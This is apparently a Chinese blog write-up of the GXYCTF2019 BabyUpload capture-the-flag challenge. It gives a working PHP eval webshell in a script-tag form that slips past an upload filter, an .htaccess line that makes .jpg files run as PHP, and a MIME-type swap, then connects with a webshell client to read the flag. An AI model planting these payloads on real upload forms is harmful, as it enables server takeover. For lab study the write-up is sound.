[GXYCTF2019]BabyUpload

flagflag打开网站,先上传一个.php试试。

提示后缀名不能有ph。

这里想到了之前在ctfhub技能树上做过一道题目,可以上传.htaccess文件,来实现把后缀名为其它类型的转换成php执行,所以这里使用这个方法来上传。

不了解.htaccess的可以先看这篇文章,之后会用到。

文件上传漏洞之.htaccess文件-CSDN博客

开始上传,先编写好一个一句话木马

然后把它改成jpg文件进行上传。

发现出现

这里应该是过滤掉了php代码标志。

那么我们再次进行抓包,查看一下是否又其他可用信息。

在这里我们看到该网站的php为5.6.23版本。

经过查询,了解到php版本在7.0以下可以执行

<script language="php">xxx</script>

来代替php。

所以这里重新写入一句话木马为

<script language="php">eval($_POST['123']);</script>

然后修改文件后缀名为.jpg再次进行上传。

上传成功!!!

之后编写.htaccess文件

AddType application/x-httpd-php .jpg

之后进行上传,抓包

修改application/octet-stream为image/jpeg后放包。

访问上传后图片的地址,之后使用蚁剑进行连接即可。

连接后在根目录中找到flag。

 

flag{c5741452-3492-43f1-b22c-c60d42e19d48}
posted @ 2024-04-17 08:00  霾散  阅读(86)  评论(0)    收藏  举报  来源